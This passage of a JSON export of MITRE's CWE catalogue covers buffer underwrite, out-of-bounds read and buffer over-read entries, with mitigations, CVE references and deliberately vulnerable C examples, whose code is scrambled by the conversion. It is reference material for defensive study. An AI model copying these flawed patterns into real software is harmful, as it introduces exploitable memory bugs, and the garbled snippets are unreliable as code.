Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"124":{"attr":{"@_ID":"124","@_Name":"Buffer Underwrite (\'Buffer Underflow\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"786","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"buffer underrun","Description":"Some prominent vendors and researchers use the term \\"buffer underrun\\". \\"Buffer underflow\\" is more commonly used, although both terms are also sometimes used to describe a buffer under-read (CWE-127)."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory","Bypass Protection Mechanism","Other"],"Note":"If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy. The consequences would only be limited by how the affected data is used, such as an adjacent memory location that is used to specify whether the user has special privileges."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"All calculated values that are used as index or for pointer arithmetic should be validated to ensure that they are within an expected range."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index &lt; length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &amp;srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-24018","Description":"buffer underwrite in firmware verification routine allows code execution via a crafted firmware image","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24018"},{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-1584","Description":"Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1584"},{"Reference":"CVE-2007-0886","Description":"Buffer underflow resultant from encoded data that triggers an integer overflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0886"},{"Reference":"CVE-2006-6171","Description":"Product sets an incorrect buffer size limit, leading to \\"off-by-two\\" buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171"},{"Reference":"CVE-2006-4024","Description":"Negative value is used in a memcpy() operation, leading to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4024"},{"Reference":"CVE-2004-2620","Description":"Buffer underflow due to mishandled special characters","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNDER - Boundary beginning violation (\'buffer underflow\'?)"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Buffer underwrite"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-90"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":[{"#text":"This could be resultant from several errors, including a bad offset or an array index that decrements before the beginning of the buffer (see CWE-129).","attr":{"@_Type":"Relationship"}},{"#text":"Much attention has been paid to buffer overflows, but \\"underflows\\" sometimes exist in products that are relatively free of overflows, so it is likely that this variant has been under-studied.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Boundary Beginning Violation (\'Buffer Underwrite\')","attr":{"@_Date":"2009-10-29"}}}},"125":{"attr":{"@_ID":"125","@_Name":"Out-of-bounds Read","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads data past the end, or before the beginning, of the intended buffer.","Extended_Description":"Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.  A crash can occur when the code reads a variable amount of data and assumes that a sentinel exists to stop the read operation, such as a NUL in a string.  The expected sentinel might not be located in the out-of-bounds memory, causing excessive data to be read, leading to a segmentation fault or a buffer overflow.  The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer.  A subsequent read operation then produces undefined or unexpected results.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","To reduce the likelihood of introducing an out-of-bounds read, ensure that you validate and ensure correct calculations for any length argument, buffer size calculation, or offset. Be especially careful of relying on a sentinel (i.e. special character such as NUL) in untrusted inputs."]}},{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":"Use a language that provides appropriate memory abstractions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index &lt; len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index &gt;= 0 &amp;&amp; index &lt; len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"},{"Reference":"CVE-2018-16069","Description":"Chain: series of floating-point precision errors\\n\\t      (CWE-1339) in a web browser rendering engine causes out-of-bounds read\\n\\t      (CWE-125), giving access to cross-origin data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16069"},{"Reference":"CVE-2004-0112","Description":"out-of-bounds read due to improper length check","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0112"},{"Reference":"CVE-2004-0183","Description":"packet with large number of specified elements cause out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0183"},{"Reference":"CVE-2004-0221","Description":"packet with large number of specified elements cause out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0221"},{"Reference":"CVE-2004-0184","Description":"out-of-bounds read, resultant from integer underflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0184"},{"Reference":"CVE-2004-1940","Description":"large length value causes out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1940"},{"Reference":"CVE-2004-0421","Description":"malformed image causes out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0421"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Out-of-bounds Read"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"540"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":{"#text":"Under-studied and under-reported. Most issues are probably labeled as buffer overflows.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"126":{"attr":{"@_ID":"126","@_Name":"Buffer Over-read","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer.","Extended_Description":"This typically occurs when the pointer or its index is incremented to a position beyond the bounds of the buffer or when pointer arithmetic results in a position outside of the valid memory location to name a few. This may result in exposure of sensitive information or possibly a crash.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) &gt; 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer &gt; BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index &lt; msg-&gt;msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg-&gt;msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."},{"Intro_Text":"The following C/C++ example demonstrates a buffer over-read due to a missing NULL terminator. The main method of a pattern matching utility that looks for a specific pattern within a specific file uses the string strncopy() method to copy the command line user input file name and pattern to the Filename and Pattern character arrays respectively.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char **argv){}","xhtml:br":["",""],"xhtml:div":{"#text":"char Filename[256];char Pattern[32];...strncpy(Filename, argv[1], sizeof(Filename));strncpy(Pattern, argv[2], sizeof(Pattern));printf(\\"Searching file: %s for the pattern: %s\\\\n\\", Filename, Pattern);Scan_File(Filename, Pattern);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["/* Validate number of parameters and ensure valid content */","/* copy filename parameter to variable, may cause off-by-one overflow */","/* copy pattern parameter to variable, may cause off-by-one overflow */"]}}},{"#text":"Pattern[31]=\'\\\\0\';","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"strncpy(Filename, argv[2], sizeof(Filename)-1);Filename[255]=\'\\\\0\';strncpy(Pattern, argv[3], sizeof(Pattern)-1);","xhtml:i":["/* copy filename parameter to variable, no off-by-one overflow */","/* copy pattern parameter to variable, no off-by-one overflow */"],"xhtml:br":["","","","",""]},"xhtml:br":""}],"Body_Text":["However, the code do not take into account that strncpy() will not add a NULL terminator when the source buffer is equal in length of longer than that provide size attribute. Therefore if a user enters a filename or pattern that are the same size as (or larger than) their respective character arrays, a NULL terminator will not be added (CWE-170) which leads to the printf() read beyond the expected end of the Filename and Pattern buffers.","To fix this problem, be sure to subtract 1 from the sizeof() call to allow room for the null byte to be added."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated, leading to buffer over-read or heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Buffer over-read"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":{"#text":"These problems may be resultant from missing sentinel values (CWE-463) or trusting a user-influenced input length variable.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}]}},"127":{"attr":{"@_ID":"127","@_Name":"Buffer Under-read","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer.","Extended_Description":"This typically occurs when the pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. This may result in exposure of sensitive information or possibly a 